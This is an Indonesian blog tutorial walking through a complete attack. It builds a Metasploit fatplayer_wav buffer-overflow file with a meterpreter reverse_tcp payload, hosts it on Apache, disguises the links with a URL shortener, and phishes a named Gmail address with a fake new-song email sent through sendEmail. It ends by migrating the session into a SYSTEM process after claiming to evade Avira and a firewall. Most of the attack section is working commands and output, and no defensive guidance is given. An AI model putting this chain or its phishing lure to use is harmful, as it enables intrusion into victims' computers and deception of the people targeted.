Searching...
November 20, 2011
Sunday, November 20, 2011

Metasploit VS Antivirus + Firewall

Meskipun ini hari libur, namun exploitasi dan tutorial harus terus berjalan. Langsung saja kita ke tutorial.

Kali ini adalah pertandingan antara:

Metasploit


VS

Firewall dan AVIRA


Dalam keadaan ini, attacker tidak dapat melakukan proses ping ke target (karena firewall). Dan attacker tidak bisa mengirim payload Trojan karena adanya antivirus. AVIRA sudah di update dengan versi terbaru (cek screen shoot). Kali ini saya akan mencoba menyerang system dengan memanfaatkan celah buffer overflow pada fatplayer versi 0.6 (terbaru).

Preparation:
  1. Metasploit
  2. Apache2
  3. URL Shortener
  4. sendEmail
Briefing:
  1. Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav
  2. Pindahkan file tersebut ke direktori /var/www
  3. Jalankan service Apache2
  4. Gunakan URL shortener
  5. Jalankan exploit/multi/handler
  6. Kirim Email ke korban
  7. Korban mendownload file dan memainkan file tersebut
  8. Game Over
Walkthrough:

1. Buat file bertipe wav dengan exploit/windows/fileformat/fatplayer_wav

Buka terminal, lalu masukan perintah:

root@red-dragon:~# msfconsole

Dalam konsol msf, masukan perintah:

msf > use exploit/windows/fileformat/fatplayer_wav 
msf  exploit(fatplayer_wav) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(fatplayer_wav) > set LHOST 192.168.1.5 
LHOST => 192.168.1.5
msf  exploit(fatplayer_wav) > set LPORT 4444 
LPORT => 4444
msf  exploit(fatplayer_wav) > set FILENAME GarudaDiDadaku.wav
FILENAME => GarudaDiDadaku.wav


msf  exploit(fatplayer_wav) > exploit 

[*] Creating 'GarudaDiDadaku.wav' file ...
[+] GarudaDiDadaku.wav stored at /root/.msf4/local/GarudaDiDadaku.wav

2. Pindahkan file tersebut ke direktori /var/www

Buka terminal, lalu masukan peritah:

root@red-dragon:~# cp /root/.msf4/local/GarudaDiDadaku.wav /var/www/GarudaDiDadaku.wav

3. Jalankan service Apache2

Buka terminal, lalu masukan perintah:

root@red-dragon:~# /etc/init.d/apache2 restart
web server apache2                                                                                                                            ... waiting .                                 [ OK ]

4. Gunakan URL shortener

Gunakan URL shortener untuk membungkus link yang mencurigakan kepada korban. Kali ii saya menggunakan URL Shortener yang disediakan oleh Google. Yaitu http://goo.gl

Kali ini saya akan memperpendek url http://sourceforge.net/projects/fatplayer/files/Fat%20Player/Fat%20Player%200.6b/FatPlayer_06b_Win32.exe/download dan http://192.168.1.5/GarudaDiDadaku.wav

Hasilnya:

Dan

5. Jalankan exploit/multi/handler

Kembali ke konsol metasploit, dan masukan perintah:


msf  exploit(fatplayer_wav) > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.5 
LHOST => 192.168.1.5
msf  exploit(handler) > set LPORT 4444 
LPORT => 4444
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.


[*] Started reverse handler on 192.168.1.5:4444 
[*] Starting the payload handler...
msf  exploit(handler) >


6. Kirim Email ke korban

Setelah exploit multi handler berjalan, sekarang saatnya memancing korban kita untuk mendownload file yang berisi exploit untuk mengambil alih system. Buka terminal, dan masukan perintah:

root@red-dragon:~# sendEmail -f "Attacker<badguy@internet.com>" -t hanggara33@gmail.com -u "Lagu baru Garuda Di dadaku" -m "Lagu Garuda di dadaku diaransemen ulang nih sama NETRAL. Download playernya di http://goo.gl/oKUHA kemudian download filenya di http://goo.gl/QIFuh" -s smtp.gmail.com:587 -xu doubledragon666@gmail.com -xp xxxxxxx

Keterangan:
-f adalah inisial pengirim email
-t adalah target
-u adalah subject email
-m adalah isi pesan
-s adalah server email
-xu adalah account email attacker
-xp adalah password account email attacker


7. Korban mendownload file dan memainkan file tersebut

Sambil menunggu korban, mari kita lihat apa yang terjadi dengan korban kita.

korban: "Oh my God. Saya dapat email...."


Kemudian korban mendownload fatplayer, dan file exploit yang kita buat.


Karena curiga file tersebut hanya sebesar 4 KB. Korban memindai file tersebut dengan antivirus AVIRA yang baru diupdate.


Setelah scan selesai, AVIRA menyatakan bahwa file terbebas dari virus, dan korban memainkan lagu tersebut dengan fatplayer.


Tidak terjadi apa-apa....

8. Game Over

Mari kita cek metasploit kita.


Kemudian kita cek informasi system dan jabatan kita di dalam system, dengan perintah sysinfo kemudian getuid




Omong kosong! Saya ingin menjadi NT AUTHORITY\NETWORK SERVICE di sini. Saya akan melakukan migrasi ke sebuah proses yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Untuk melakukan migrasi, kita harus mengetahui process ID yang dijalankan oleh NT AUTHORITY\NETWORK SERVICE. Masukan perintah ps.


meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                           Path
 ---   ----               ----  -------  ----                           ----
 0     [System Process]                                                
 1056  svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1148  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1276  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1388  explorer.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\Explorer.EXE
 1532  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1592  sched.exe          x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
 1704  VMwareTray.exe     x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1712  vmtoolsd.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1720  rundll32.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\rundll32.exe
 1728  avgnt.exe          x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
 1948  TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 1996  avguard.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
 2008  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 2760  TPAutoConnect.exe  x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 3080  FatPlayer.exe      x86   0        ROOT-11E5DB48A8\Administrator  C:\Documents and Settings\Administrator\My Documents\Downloads\FatPlayer 0.6b\FatPlayer.exe
 3124  wuauclt.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\wuauclt.exe
 4     System             x86   0                                      
 452   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 540   smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 604   csrss.exe          x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 628   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   services.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 844   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 856   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 960   alg.exe            x86   0                                       C:\WINDOWS\System32\alg.exe
 964   svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe

Kemudian migrasi ke process 964, yaitu process svchost.exe yang dijalankan oleh NT AUTHORITY\SYSTEM .

meterpreter > migrate 964
[*] Migrating to 964...
[*] Migration completed successfully.
meterpreter >

Kemudian cek kembali jabatan kita di dalam system tersebut dengan perintah getuid.

meterpreter > getuid 
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 


GAME OVER
Kita mendapatkan jabatan tertinggi untuk mengendalikan system korban.

=)

Originally created by:
red-dragon

Supported by:
Blue Dragon

Loved By:
Yoshephine Handini

Thanks to my Followers.

3 comment:

  1. terus cara bertahannya gimana mas?
    cara untuk menangkal serangan ini

    ReplyDelete
  2. mantap bang... bahas juga bang tetang exploit di android, dari sending payload sampe tanem backdoor

    ReplyDelete

 
Back to top!